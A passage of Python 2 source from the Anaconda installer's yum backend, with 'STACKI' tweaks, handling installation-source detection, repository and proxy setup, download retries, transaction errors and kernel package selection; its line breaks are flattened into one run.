"file:///mnt/sysimage/%s" % path elif self.anaconda.methodstr: m = self.anaconda.methodstr if m.startswith("hd:"): if m.count(":") == 2: (device, path) = m[3:].split(":") fstype = "auto" else: (device, fstype, path) = m[3:].split(":") # First check for an installable tree isys.mount(device, self.tree, fstype=fstype) if os.path.exists("%s/%s/repodata/repomd.xml" % (self.tree, path)): self._baseRepoURL = "file://%s/%s" % (self.tree, path) return isys.umount(self.tree, removeDir=False) # Look for .iso images self.isodir = "/mnt/isodir/%s" % path # This takes care of mounting /mnt/isodir first. self._switchImage(1) self.mediagrabber = self.mediaHandler elif m.startswith("nfsiso:"): self.isodir = "/mnt/isodir" # Calling _switchImage takes care of mounting /mnt/isodir first. 
if not network.hasActiveNetDev(): if not self.anaconda.intf.enableNetwork(): self._baseRepoURL = None return urlgrabber.grabber.reset_curl_obj() self._switchImage(1) self.mediagrabber = self.mediaHandler elif m.startswith("http") or m.startswith("ftp:"): self._baseRepoURL = m elif m.startswith("nfs:"): if not network.hasActiveNetDev(): if not self.anaconda.intf.enableNetwork(): self._baseRepoURL = None urlgrabber.grabber.reset_curl_obj() (opts, server, path) = iutil.parseNfsUrl(m) isys.mount(server+":"+path, self.tree, "nfs", options=opts) # This really should be fixed in loader instead but for now see # if there's images and if so go with this being an NFSISO # install instead. images = findIsoImages(self.tree, self.anaconda.intf.messageWindow) if images != {}: isys.umount(self.tree, removeDir=False) self.anaconda.methodstr = "nfsiso:%s" % m[4:] self.configBaseURL() return elif m.startswith("cdrom:"): self._switchCD(1) self.mediagrabber = self.mediaHandler self._baseRepoURL = "file://%s" % self.tree else: # No methodstr was given. In order to find an installation source, # we should first check to see if there's a CD/DVD with packages # on it, and then default to the mirrorlist URL. The user can # always change the repo with the repo editor later. cdr = scanForMedia(self.tree, self.anaconda.id.storage) if cdr: self.mediagrabber = self.mediaHandler self.anaconda.mediaDevice = cdr self.currentMedia = 1 log.info("found installation media on %s" % cdr) else: # No CD with media on it and no repo=/method= parameter, so # default to using whatever's enabled in /etc/yum.repos.d/ self._baseRepoURL = None def configBaseRepo(self, root='/'): # Create the "base" repo object, assuming there is one. Otherwise we # just skip all this and use the defaults from /etc/yum.repos.d. if not self._baseRepoURL: return # add default repos anacondabaseurl = (self.anaconda.methodstr or "cdrom:%s" % (self.anaconda.mediaDevice)) anacondabasepaths = self.anaconda.id.instClass.getPackagePaths(anacondabaseurl) for (name, uri) in self.anaconda.id.instClass.getPackagePaths(self._baseRepoURL).items(): rid = name.replace(" ", "") repo = AnacondaYumRepo("anaconda-%s-%s" % (rid, productStamp)) repo.baseurl = uri repo.anacondaBaseURLs = anacondabasepaths[name] repo.name = name repo.cost = 100 if self.anaconda.mediaDevice or self.isodir: repo.mediaid = getMediaId(self.tree) log.info("set mediaid of repo %s to: %s" % (rid, repo.mediaid)) if self.anaconda.proxy: self.setProxy(self.anaconda, repo) if flags.noverifyssl: repo.sslverify = False repo.enable() self.repos.add(repo) def mediaHandler(self, *args, **kwargs): mediaid = kwargs["mediaid"] discnum = kwargs["discnum"] relative = kwargs["relative"] # The package exists on media other than what's mounted right now. if discnum != self.currentMedia: log.info("switching from media #%s to #%s for %s" % (self.currentMedia, discnum, relative)) # Unmount any currently mounted ISO images and mount the one # containing the requested packages. if self.isodir: self._switchImage(discnum) else: self._switchCD(discnum) ug = URLGrabber(checkfunc=kwargs["checkfunc"]) ug.urlgrab("%s/%s" % (self.tree, kwargs["relative"]), kwargs["local"], text=kwargs["text"], range=kwargs["range"], copy_local=1) return kwargs["local"] # XXX: This is straight out of yum, but we need to override it here in # order to use our own repo class. def readRepoConfig(self, parser, section): '''Parse an INI file section for a repository. @param parser: ConfParser or similar to read INI file values from. 
@param section: INI file section to read. @return: YumRepository instance. ''' repo = AnacondaYumRepo(section) repo.populate(parser, section, self.conf) # Ensure that the repo name is set if not repo.name: repo.name = section self.logger.error(_('Repository %r is missing name in configuration, ' 'using id') % section) # Set attributes not from the config file repo.yumvar.update(self.conf.yumvar) repo.cfg = parser if "-source" in repo.id or "-debuginfo" in repo.id: name = repo.name del(repo) raise RepoError, "Repo %s contains -source or -debuginfo, excluding" % name # this is a little hard-coded, but it's effective if productIsFinal and ("rawhide" in repo.id or "development" in repo.id): name = repo.name del(repo) raise RepoError, "Excluding devel repo %s for non-devel anaconda" % name if not productIsFinal and not repo.enabled: name = repo.name del(repo) raise RepoError, "Excluding disabled repo %s for prerelease" % name # If repo=/method= was passed in, we want to default these extra # repos to off. if self._baseRepoURL: repo.enabled = False return repo def setProxy(self, src, dest): """ Set the proxy settings from a string in src.proxy If the string includes un/pw use those, otherwise set the un/pw from src.proxyUsername and src.proxyPassword dest has dest.proxy set to the host and port (no un/pw) dest.proxy_username and dest.proxy_password are set if present in src """ # This is the same pattern as from loader/urls.c:splitProxyParam # except that the POSIX classes have been replaced with character # ranges # NOTE: If this changes, update tests/regex/proxy.py # # proxy=[protocol://][username[:password]@]host[:port][path] pattern = re.compile("([A-Za-z]+://)?(([A-Za-z0-9]+)(:[^:@]+)?@)?([^:/]+)(:[0-9]+)?(/.*)?") m = pattern.match(src.proxy) if m and m.group(3): dest.proxy_username = m.group(3) elif getattr(src, "proxyUsername", None): dest.proxy_username = src.proxyUsername if m and m.group(4): # Skip the leading colon. dest.proxy_password = m.group(4)[1:] elif getattr(src, "proxyPassword", None): dest.proxy_password = src.proxyPassword if dest.proxy_username or dest.proxy_password: proxy_auth = "%s:%s@" % (dest.proxy_username or '', dest.proxy_password or '') else: proxy_auth = "" if m and m.group(5): # If both a host and port was found, just paste them # together using the colon at the beginning of the port # match as a separator. Otherwise, just use the host. if m.group(6): proxy = m.group(5) + m.group(6) else: proxy = m.group(5) # yum also requires a protocol. If none was given, # default to http. if m.group(1): dest.proxy_url = m.group(1) + proxy_auth + proxy proxy = m.group(1) + proxy else: dest.proxy_url = "http://" + proxy_auth + proxy proxy = "http://" + proxy # Set the repo proxy. NOTE: yum immediately parses this and # raises an error if it isn't correct dest.proxy = proxy def _getAddons(self, repo): """ Check the baseurl or mirrorlist for a repository, see if it has any valid addon repos and if so, return a list of (repo name, repo URL). """ baseurl = repo.mirrorlist or repo.baseurl[0] retval = [] c = ConfigParser() # If there's no .treeinfo for this repo, don't bother looking for addons. treeinfo = self._getTreeinfo(baseurl, repo.proxy_url, repo.sslverify) if not treeinfo: return retval # We need to know which variant is being installed so we know what addons # are valid options. 
try: ConfigParser.read(c, treeinfo) variant = c.get("general", "variant") except: return retval section = "variant-%s" % variant if c.has_section(section) and c.has_option(section, "addons"): validAddons = c.get(section, "addons").split(",") else: return retval for addon in validAddons: addonSection = "addon-%s" % addon if not c.has_section(addonSection) or not c.has_option(addonSection, "repository"): continue url = "%s/%s" % (baseurl, c.get(addonSection, "repository")) retval.append((addon, c.get(addonSection, "name"), url)) return retval def _getTreeinfo(self, baseurl, proxy_url, sslverify): """ Try to get .treeinfo file from baseurl, optionally using proxy_url Saves the file into /tmp/.treeinfo """ if not baseurl: return None if baseurl.startswith("http") or baseurl.startswith("ftp"): if not network.hasActiveNetDev(): if not self.anaconda.intf.enableNetwork(): log.error("Error downloading %s/.treeinfo: network enablement failed" % (baseurl)) return None urlgrabber.grabber.reset_curl_obj() ug = URLGrabber() ugopts = { "ssl_verify_peer" : sslverify, "ssl_verify_host" : sslverify } if proxy_url and proxy_url.startswith("http"): proxies = { 'http' : proxy_url, 'https' : proxy_url } elif proxy_url and proxy_url.startswith("ftp"): proxies = { 'ftp' : proxy_url } else: proxies = {} try: ug.urlgrab("%s/.treeinfo" % baseurl, "/tmp/.treeinfo", copy_local=1, proxies=proxies, **ugopts) except Exception as e: try: ug.urlgrab("%s/treeinfo" % baseurl, "/tmp/.treeinfo", copy_local=1, proxies=proxies) except Exception as e: log.error("Error downloading treeinfo file: %s" % e) return None return "/tmp/.treeinfo" def _getReleasever(self): """ We need to make sure $releasever gets set up before .repo files are read. Since there's no redhat-release package in /mnt/sysimage (and won't be for quite a while), we need to do our own substutition. """ c = ConfigParser() treeinfo = self._getTreeinfo(self._baseRepoURL, self.proxy_url, not flags.noverifyssl) if not treeinfo: return productVersion ConfigParser.read(c, treeinfo) try: return c.get("general", "version") except: return productVersion # Override this method so yum doesn't nuke our existing logging config. def doLoggingSetup(self, *args, **kwargs): import yum.logginglevels file_handler = logging.FileHandler("/tmp/yum.log") file_formatter = logging.Formatter("[%(asctime)s] %(levelname)-8s: %(message)s") file_handler.setFormatter(file_formatter) tty3_handler = logging.FileHandler("/dev/tty3") tty3_formatter = logging.Formatter("%(asctime)s %(levelname)-8s: %(name)s: %(message)s", "%H:%M:%S") tty3_handler.setFormatter(tty3_formatter) verbose = logging.getLogger("yum.verbose") verbose.setLevel(logging.DEBUG) verbose.propagate = False verbose.addHandler(file_handler) logger = logging.getLogger("yum") logger.propagate = False logger.setLevel(yum.logginglevels.DEBUG_4) logger.addHandler(file_handler) anaconda_log.autoSetLevel(tty3_handler, True) tty3_handler.setLevel(anaconda_log.logger.loglevel) logger.addHandler(tty3_handler) # XXX filelogger is set in setFileLog - do we or user want it? 
filelogger = logging.getLogger("yum.filelogging") filelogger.setLevel(logging.INFO) filelogger.propagate = False def doConfigSetup(self, fn='/tmp/anaconda-yum.conf', root='/'): if hasattr(self, "preconf"): self.preconf.fn = fn self.preconf.root = root self.preconf.releasever = self._getReleasever() self.preconf.enabled_plugins = ["whiteout", "blacklist", "pidplugin"] YumSorter._getConfig(self) else: YumSorter._getConfig(self, fn=fn, root=root, enabled_plugins=["whiteout", "blacklist", "pidplugin"]) self.configBaseRepo(root=root) mediaAddons = [] extraRepos = [] ddArch = os.uname()[4] #Add the Driver disc repos to Yum for d in glob.glob(DD_RPMS): dirname = os.path.basename(d) rid = "anaconda-%s" % dirname repo = AnacondaYumRepo(rid) repo.baseurl = [ "file://%s" % d ] repo.name = "Driver Disk %s" % dirname.split("-")[1] repo.enable() extraRepos.append(repo) if self.anaconda.isKickstart: for ksrepo in self.anaconda.id.ksdata.repo.repoList: if ksrepo.baseurl == "file://anaconda-addon": mediaAddons.append(ksrepo.name) continue anacondaBaseURLs = [ksrepo.baseurl] # yum doesn't understand nfs:// and doesn't want to. We need # to first do the mount, then translate it into a file:// that # yum does understand. # "nfs:" and "nfs://" prefixes are accepted in ks repo --baseurl if ksrepo.baseurl and ksrepo.baseurl.startswith("nfs:"): dest = tempfile.mkdtemp("", ksrepo.name.replace(" ", ""), "/mnt") # handle "nfs://" prefix if ksrepo.baseurl[4:6] == '//': ksrepo.baseurl = ksrepo.baseurl.replace('//', '', 1) anacondaBaseURLs = [ksrepo.baseurl] try: isys.mount(ksrepo.baseurl[4:], dest, "nfs") except Exception as e: log.error("error mounting NFS repo: %s" % e) ksrepo.baseurl = "file://%s" % dest repo = AnacondaYumRepo(ksrepo.name) repo.mirrorlist = ksrepo.mirrorlist repo.name = ksrepo.name if not ksrepo.baseurl: repo.baseurl = [] else: repo.baseurl = [ ksrepo.baseurl ] repo.anacondaBaseURLs = anacondaBaseURLs if ksrepo.cost: repo.cost = ksrepo.cost if ksrepo.excludepkgs: repo.exclude = ksrepo.excludepkgs if ksrepo.includepkgs: repo.includepkgs = ksrepo.includepkgs if ksrepo.noverifyssl: repo.sslverify = False if ksrepo.proxy: self.setProxy(ksrepo, repo) elif self.anaconda.proxy: log.debug("%s will use the global proxy configuration", repo.name) self.setProxy(self.anaconda, repo) repo.enable() extraRepos.append(repo) initialRepos = self.repos.repos.values() + extraRepos for repo in initialRepos: addons = self._getAddons(repo) for addon in addons: addonRepo = AnacondaYumRepo(addon[0]) addonRepo.name = addon[1] addonRepo.baseurl = [ addon[2] ] if self.anaconda.proxy: self.setProxy(self.anaconda, addonRepo) extraRepos.append(addonRepo) for repo in extraRepos: try: self.repos.add(repo) log.info("added repository %s with URL %s" % (repo.name, repo.mirrorlist or repo.baseurl[0])) if repo.name in mediaAddons: repo.enable() except: log.warning("ignoring duplicate repository %s with URL %s" % (repo.name, repo.mirrorlist or repo.baseurl[0])) self.repos.setCacheDir(self.conf.cachedir) # When upgrading cleanup the yum cache and enable the addons # This has to be called after setCacheDir if self.anaconda.id.getUpgrade(): for repo in extraRepos: repo.dirCleanup(upgrade=True) repo.enable() log.info("enabled %s for upgrade" % (repo.name)) if os.path.exists("%s/boot/upgrade/install.img" % self.anaconda.rootPath): log.info("REMOVING stage2 image from %s /boot/upgrade" % self.anaconda.rootPath ) try: os.unlink("%s/boot/upgrade/install.img" % self.anaconda.rootPath) except: log.warning("failed to clean /boot/upgrade") def 
downloadHeader(self, po): trynumber = 0 while True: # retrying version of download header trynumber += 1 try: YumSorter.downloadHeader(self, po) break except yum.Errors.NoMoreMirrorsRepoError: self._handleFailure(po, trynumber) except IOError: self._handleFailure(po, trynumber) except yum.Errors.RepoError, e: continue def _handleFailure(self, package, trynumber=YUM_DOWNLOAD_RETRIES): if not self.isodir and self.currentMedia: buttons = [_("Re_boot"), _("_Eject")] else: buttons = [_("Re_boot"), _("_Retry")] pkgFile = to_unicode(os.path.basename(package.remote_path)) if package.repo.needsNetwork() and not network.hasActiveNetDev(): if not self.anaconda.intf.enableNetwork(): return urlgrabber.grabber.reset_curl_obj() # only show the retry window after 3 tries if trynumber < YUM_DOWNLOAD_RETRIES: log.warning('package download failure, retrying automatically') time.sleep(YUM_DOWNLOAD_DELAY * trynumber) rc = 1 else: rc = self.anaconda.intf.messageWindow(_("Error"), _("The file %s cannot be opened. This is due to a missing " "file, a corrupt package or corrupt media. Please " "verify your installation source.\n\n" "If you exit, your system will be left in an inconsistent " "state that will likely require reinstallation.\n\n") % (pkgFile,), type="custom", custom_icon="error", custom_buttons=buttons) if rc == 0: sys.exit(0) else: if os.path.exists(package.localPkg()): os.unlink(package.localPkg()) if not self.isodir and self.currentMedia: self._switchCD(self.currentMedia) else: return def mirrorFailureCB (self, obj, *args, **kwargs): # STACKI # # everytime we hit this method, increase the timeout # repo = self.repos.getRepo(kwargs["repo"]) log.info("STACKI:mirrorFailureCB: sleeping for %s seconds" % repo.timeout) time.sleep(repo.timeout) repo.timeout += 10.0 # # the call to _setupGrab() makes yum reread its options, thus, it will # update the timeout # repo._setupGrab() return # STACKI # This gets called when a mirror fails, but it cannot know whether # or not there are other mirrors left to try, since it cannot know # which mirror we were on when we started this particular download. # Whenever we have run out of mirrors the grabber's get/open/retrieve # method will raise a URLGrabError exception with errno 256. 
grab = self.repos.getRepo(kwargs["repo"]).grab log.warning("Failed to get %s from mirror %d/%d, " "or downloaded file is corrupt" % (obj.url, grab._next + 1, len(grab.mirrors))) if self.currentMedia: dev = self.anaconda.id.storage.devicetree.getDeviceByName(self.anaconda.mediaDevice) dev.format.mountpoint = self.tree unmountCD(dev, self.anaconda.intf.messageWindow) self.currentMedia = None def urlgrabberFailureCB (self, obj, *args, **kwargs): if hasattr(obj, "exception"): log.warning("Try %s/%s for %s failed: %s" % (obj.tries, obj.retry, obj.url, obj.exception)) else: log.warning("Try %s/%s for %s failed" % (obj.tries, obj.retry, obj.url)) if obj.tries == obj.retry: return delay = 0.25*(2**(obj.tries-1)) if delay > 1: w = self.anaconda.intf.waitWindow(_("Retrying"), _("Retrying download.")) time.sleep(delay) w.pop() else: time.sleep(delay) def getDownloadPkgs(self): downloadpkgs = [] totalSize = 0 totalFiles = 0 for txmbr in self.tsInfo.getMembersWithState(output_states=TS_INSTALL_STATES): if txmbr.po: totalSize += int(txmbr.po.returnSimple("installedsize")) / 1024 for filetype in txmbr.po.returnFileTypes(): totalFiles += len(txmbr.po.returnFileEntries(ftype=filetype)) downloadpkgs.append(txmbr.po) return (downloadpkgs, totalSize, totalFiles) def setColor(self): if rpmUtils.arch.isMultiLibArch(): self.ts.ts.setColor(3) def run(self, instLog, cb, intf, id): def mediasort(a, b): # sort so that first CD comes first, etc. -99 is a magic number # to tell us that the cd should be last if a == -99: return 1 elif b == -99: return -1 if a < b: return -1 elif a > b: return 1 return 0 self.initActionTs() if id.getUpgrade(): self.ts.ts.setProbFilter(~rpm.RPMPROB_FILTER_DISKSPACE) # STACKI self.ts.ts.setProbFilter(rpm.RPMPROB_FILTER_REPLACEOLDFILES | rpm.RPMPROB_FILTER_REPLACENEWFILES) # STACKI self.setColor() # If we don't have any required media assume single disc if self.tsInfo.reqmedia == {}: self.tsInfo.reqmedia[0] = None mkeys = self.tsInfo.reqmedia.keys() mkeys.sort(mediasort) if os.path.ismount("/mnt/stage2"): isys.umount("/mnt/stage2") for i in mkeys: self.tsInfo.curmedia = i if i > 0: pkgtup = self.tsInfo.reqmedia[i][0] try: self.dsCallback = DownloadHeaderProgress(intf, self) self.populateTs(keepold=0) self.dsCallback.pop() self.dsCallback = None except RepoError, e: msg = _("There was an error running your transaction for " "the following reason: %s\n") % str(e) if self.anaconda.id.upgrade or self.anaconda.isKickstart: rc = intf.messageWindow(_("Error"), msg, type="custom", custom_icon="error", custom_buttons=[_("_Exit installer")]) sys.exit(1) else: rc = intf.messageWindow(_("Error"), msg, type="custom", custom_icon="error", custom_buttons=[_("_Back"), _("_Exit installer")]) if rc == 1: sys.exit(1) else: self.tsInfo.curmedia = None return DISPATCH_BACK self.ts.check() self.ts.order() self.anaconda.id.bootloader.trusted_boot = self.isPackageInstalled(name="tboot") and not iutil.inXen() if self._run(instLog, cb, intf) == DISPATCH_BACK: self.tsInfo.curmedia = None return DISPATCH_BACK self.ts.close() def _run(self, instLog, cb, intf): # set log fd. FIXME: this is ugly. see changelog entry from 2005-09-13 self.ts.ts.scriptFd = instLog.fileno() rpm.setLogFile(instLog) uniqueProbs = {} spaceneeded = {} spaceprob = "" fileConflicts = [] fileprob = "" try: self.runTransaction(cb=cb) except YumBaseError, probs: # FIXME: we need to actually look at these problems... 
probTypes = { rpm.RPMPROB_NEW_FILE_CONFLICT : _('file conflicts'), rpm.RPMPROB_FILE_CONFLICT : _('file conflicts'), rpm.RPMPROB_OLDPACKAGE: _('older package(s)'), rpm.RPMPROB_DISKSPACE: _('insufficient disk space'), rpm.RPMPROB_DISKNODES: _('insufficient disk inodes'), rpm.RPMPROB_CONFLICT: _('package conflicts'), rpm.RPMPROB_PKG_INSTALLED: _('package already installed'), rpm.RPMPROB_REQUIRES: _('required package'), rpm.RPMPROB_BADARCH: _('package for incorrect arch'), rpm.RPMPROB_BADOS: _('package for incorrect os'), } for (descr, (ty, mount, need)) in probs.value: # FIXME: probs.value??? log.error("%s: %s" %(probTypes[ty], descr)) if not uniqueProbs.has_key(ty) and probTypes.has_key(ty): uniqueProbs[ty] = probTypes[ty] if ty == rpm.RPMPROB_DISKSPACE: spaceneeded[mount] = need elif ty in [rpm.RPMPROB_NEW_FILE_CONFLICT, rpm.RPMPROB_FILE_CONFLICT]: fileConflicts.append(descr) if spaceneeded: spaceprob = _("You need more space on the following " "file systems:\n") for (mount, need) in spaceneeded.items(): log.info("(%s, %s)" %(mount, need)) if mount.startswith("/mnt/sysimage/"): mount.replace("/mnt/sysimage", "") elif mount.startswith("/mnt/sysimage"): mount = "/" + mount.replace("/mnt/sysimage", "") spaceprob += "%d M on %s\n" % (need / (1024*1024), mount) elif fileConflicts: fileprob = _("There were file conflicts when checking the " "packages to be installed:\n%s\n") % ("\n".join(fileConflicts),) msg = _("There was an error running your transaction for " "the following reason(s): %s.\n") % ', '.join(uniqueProbs.values()) spaceprob = to_unicode(spaceprob) fileprob = to_unicode(fileprob) if len(self.anaconda.backend.getRequiredMedia()) > 1 or \ self.anaconda.id.upgrade or self.anaconda.isKickstart: intf.detailedMessageWindow(_("Error Running Transaction"), msg, spaceprob + "\n" + fileprob, type="custom", custom_icon="error", custom_buttons=[_("_Exit installer")]) sys.exit(1) else: rc = intf.detailedMessageWindow(_("Error Running Transaction"), msg, spaceprob + "\n" + fileprob, type="custom", custom_icon="error", custom_buttons=[_("_Back"), _("_Exit installer")]) if rc == 1: sys.exit(1) else: self._undoDepInstalls() return DISPATCH_BACK def doMacros(self): for (key, val) in self.macros.items(): rpm.addMacro(key, val) def simpleDBInstalled(self, name, arch=None): # FIXME: doing this directly instead of using self.rpmdb.installed() # speeds things up by 400% mi = self.ts.ts.dbMatch('name', name) if mi.count() == 0: return False if arch is None: return True if arch in map(lambda h: h['arch'], mi): return True return False def isPackageInstalled(self, name = None, epoch = None, version = None, release = None, arch = None, po = None): # FIXME: this sucks. we should probably suck it into yum proper # but it'll need a bit of cleanup first. 
if po is not None: (name, epoch, version, release, arch) = po.returnNevraTuple() installed = False if name and not (epoch or version or release or arch): installed = self.simpleDBInstalled(name) elif self.rpmdb.installed(name = name, epoch = epoch, ver = version, rel = release, arch = arch): installed = True lst = self.tsInfo.matchNaevr(name = name, epoch = epoch, ver = version, rel = release, arch = arch) for txmbr in lst: if txmbr.output_state in TS_INSTALL_STATES: return True if installed and len(lst) > 0: # if we get here, then it was installed, but it's in the tsInfo # for an erase or obsoleted --> not going to be installed at end return False return installed def isGroupInstalled(self, grp): if grp.selected: return True elif grp.installed and not grp.toremove: return True return False def _pkgExists(self, pkg): """Whether or not a given package exists in our universe.""" try: pkgs = self.pkgSack.returnNewestByName(pkg) return True except yum.Errors.PackageSackError: pass try: pkgs = self.rpmdb.returnNewestByName(pkg) return True except (IndexError, yum.Errors.PackageSackError): pass return False def _groupHasPackages(self, grp): # this checks to see if the given group has any packages available # (ie, already installed or in the sack of available packages) # so that we don't show empty groups. also, if there are mandatory # packages and we have none of them, don't show for pkg in grp.mandatory_packages.keys(): if self._pkgExists(pkg): return True if len(grp.mandatory_packages) > 0: return False for pkg in grp.default_packages.keys() + grp.optional_packages.keys() + \ grp.conditional_packages.keys(): if self._pkgExists(pkg): return True return False class YumBackend(AnacondaBackend): def __init__ (self, anaconda): AnacondaBackend.__init__(self, anaconda) self.supportsPackageSelection = True buf = """ [main] installroot=%s cachedir=/var/cache/yum keepcache=0 logfile=/tmp/yum.log metadata_expire=0 obsoletes=True pluginpath=/usr/lib/yum-plugins,/tmp/updates/yum-plugins pluginconfpath=/etc/yum/pluginconf.d,/tmp/updates/pluginconf.d plugins=1 reposdir=/etc/anaconda.repos.d,/tmp/updates/anaconda.repos.d,/tmp/product/anaconda.repos.d debuglevel=6 """ % (anaconda.rootPath) if anaconda.proxy: buf += "proxy=%s\n" % anaconda.proxy if anaconda.proxyUsername: buf += "proxy_username=%s\n" % anaconda.proxyUsername if anaconda.proxyPassword: buf += "proxy_password=%s\n" % anaconda.proxyPassword fd = open("/tmp/anaconda-yum.conf", "w") fd.write(buf) fd.close() def complete(self, anaconda): if not anaconda.mediaDevice and os.path.ismount(self.ayum.tree): isys.umount(self.ayum.tree) # Attempt to clean up Yum so that running yum in post will work (#1110148) self.ayum.closeRpmDB() del self.ayum.tsInfo del self.ayum.ts self.ayum.close() # clean up rpmdb locks so that kickstart %post scripts aren't # unhappy (#496961) iutil.resetRpmDb(anaconda.rootPath) def doBackendSetup(self, anaconda): if anaconda.dir == DISPATCH_BACK: return DISPATCH_BACK if anaconda.id.getUpgrade(): # FIXME: make sure that the rpmdb doesn't have stale locks :/ iutil.resetRpmDb(anaconda.rootPath) iutil.writeRpmPlatform() self.ayum = AnacondaYum(anaconda) self.ayum.setup() self.ayum.doMacros() # If any enabled repositories require networking, go ahead and bring # it up now. No need to have people wait for the timeout when we # know this in advance. 
if len(filter(lambda r: r.needsNetwork(), self.ayum.repos.listEnabled())) > 0 and \ not network.hasActiveNetDev(): if not anaconda.intf.enableNetwork(): anaconda.intf.messageWindow(_("No Network Available"), _("Some of your software repositories require " "networking, but there was an error enabling the " "network on your system."), type="custom", custom_icon="error", custom_buttons=[_("_Exit installer")]) sys.exit(1) urlgrabber.grabber.reset_curl_obj() self.doRepoSetup(anaconda) self.doSackSetup(anaconda) self.doGroupSetup(anaconda) self.ayum.doMacros() def doGroupSetup(self, anaconda): while True: try: # FIXME: this is a pretty ugly hack to make it so that we don't lose # groups being selected (#237708) sel = filter(lambda g: g.selected, self.ayum.comps.get_groups()) self.ayum.doGroupSetup() # now we'll actually reselect groups.. map(lambda g: self.selectGroup(g.groupid), sel) # and now, to add to the hacks, we'll make sure that packages don't # have groups double-listed. this avoids problems with deselecting # groups later for txmbr in self.ayum.tsInfo.getMembers(): txmbr.groups = yum.misc.unique(txmbr.groups) except (GroupsError, NoSuchGroup, RepoError), e: buttons = [_("_Exit installer"), _("_Retry")] else: break # success rc = anaconda.intf.messageWindow(_("Error"), _("Unable to read group information " "from repositories. This is " "a problem with the generation " "of your install tree."), type="custom", custom_icon="error", custom_buttons = buttons) if rc == 0: sys.exit(0) else: self.ayum._setGroups(None) continue def doRepoSetup(self, anaconda, thisrepo = None, fatalerrors = True): self.__withFuncDo(anaconda, lambda r: self.ayum.doRepoSetup(thisrepo=r.id), thisrepo=thisrepo, fatalerrors=fatalerrors, callback=RepoSetupPulseProgress(anaconda.intf)) def doSackSetup(self, anaconda, thisrepo = None, fatalerrors = True): self.__withFuncDo(anaconda, lambda r: self.ayum.doSackSetup(thisrepo=r.id), thisrepo=thisrepo, fatalerrors=fatalerrors, callback=SackSetupProgress(anaconda.intf)) def __withFuncDo(self, anaconda, fn, thisrepo=None, fatalerrors=True, callback=None): # Don't do this if we're being called as a dispatcher step (instead # of being called when a repo is added via the UI) and we're going # back. if thisrepo is None and anaconda.dir == DISPATCH_BACK: return # We want to call the function one repo at a time so we have some # concept of which repo didn't set up correctly. if thisrepo is not None: repos = [self.ayum.repos.getRepo(thisrepo)] else: repos = self.ayum.repos.listEnabled() for repo in repos: if callback: callback.connect(repo) while True: try: fn(repo) if callback: callback.disconnect() except RepoError, e: if callback: callback.disconnect() if repo.needsNetwork() and not network.hasActiveNetDev(): if anaconda.intf.enableNetwork(): repo.mirrorlistparsed = False continue urlgrabber.grabber.reset_curl_obj() buttons = [_("_Exit installer"), _("Edit"), _("_Retry")] else: break # success if anaconda.isKickstart: buttons.append(_("_Continue")) if not fatalerrors: raise RepoError, e rc = anaconda.intf.messageWindow(_("Error"), _("Unable to read package metadata. This may be " "due to a missing repodata directory. 
Please " "ensure that your install tree has been " "correctly generated.\n\n%s" % e), type="custom", custom_icon="error", custom_buttons=buttons) if rc == 0: # abort sys.exit(0) elif rc == 1: # edit anaconda.intf.editRepoWindow(repo) break elif rc == 2: # retry, but only if button is present continue else: # continue, but only if button is present self.ayum.repos.delete(repo.id) break # if we're in kickstart the repo may have been deleted just above try: self.ayum.repos.getRepo(repo.id) except RepoError: log.debug("repo %s has been removed" % (repo.id,)) continue repo.setFailureObj(self.ayum.urlgrabberFailureCB) repo.setMirrorFailureObj((self.ayum.mirrorFailureCB, (), {"repo": repo.id})) self.ayum.repos.callback = None def getDefaultGroups(self, anaconda): langs = anaconda.id.instLanguage.getCurrentLangSearchList() rc = map(lambda x: x.groupid, filter(lambda x: x.default, self.ayum.comps.groups)) for g in self.ayum.comps.groups: if g.langonly in langs: rc.append(g.groupid) return rc def resetPackageSelections(self): """Reset the package selection to an empty state.""" for txmbr in self.ayum.tsInfo: self.ayum.tsInfo.remove(txmbr.pkgtup) self.ayum.tsInfo.conditionals.clear() for grp in self.ayum.comps.groups: grp.selected = False def selectModulePackages(self, anaconda, kernelPkgName): (base, sep, ext) = kernelPkgName.partition("-") moduleProvides = [] for (path, name) in anaconda.id.extraModules: if ext != "": moduleProvides.append("dud-%s-%s" % (name, ext)) else: moduleProvides.append("dud-%s" % name) #We need to install the packages which contain modules from DriverDiscs for modPath in isys.modulesWithPaths(): log.debug("Checking for DUD module "+modPath) match = DD_EXTRACTED.match(modPath) if match: log.info("Requesting install of kmod-%s" % (match.group("modulename"))) moduleProvides.append("kmod-"+match.group("modulename")) else: continue for module in moduleProvides: pkgs = self.ayum.returnPackagesByDep(module) if not pkgs: log.warning("Didn't find any package providing %s" % module) for pkg in pkgs: log.info("selecting package %s for %s" % (pkg.name, module)) self.ayum.install(po=pkg) def selectBestKernel(self, anaconda): """Find the best kernel package which is available and select it.""" def getBestKernelByArch(pkgname, ayum): """Convenience func to find the best arch of a kernel by name""" try: pkgs = ayum.pkgSack.returnNewestByName(pkgname) except yum.Errors.PackageSackError: return None pkgs = self.ayum.bestPackagesFromList(pkgs) if len(pkgs) == 0: return None return pkgs[0] def selectKernel(pkgname): try: pkg = getBestKernelByArch(pkgname, self.ayum) except PackageSackError: log.debug("no %s package" % pkgname) return False if not pkg: return False log.info("selected %s package for kernel" % pkg.name) self.ayum.install(po=pkg) self.selectModulePackages(anaconda, pkg.name) if len(self.ayum.tsInfo.matchNaevr(name="gcc")) > 0: log.debug("selecting %s-devel" % pkg.name) self.selectPackage("%s-devel.%s" % (pkg.name, pkg.arch)) return True if anaconda.isKickstart and "kernel" in anaconda.id.ksdata.packages.excludedList: return foundkernel = False if not foundkernel and isys.isPaeAvailable(): if selectKernel("kernel-PAE"): foundkernel = True if not foundkernel: selectKernel("kernel") def selectFSPackages(self, storage): fspkgs = set() for device in storage.fsset.devices: # this takes care of device and filesystem packages for pkg in device.packages: fspkgs.add(pkg) map(self.selectPackage, fspkgs) def selectAnacondaNeeds(self, anaconda): # Only add in chkconfig if they did something 
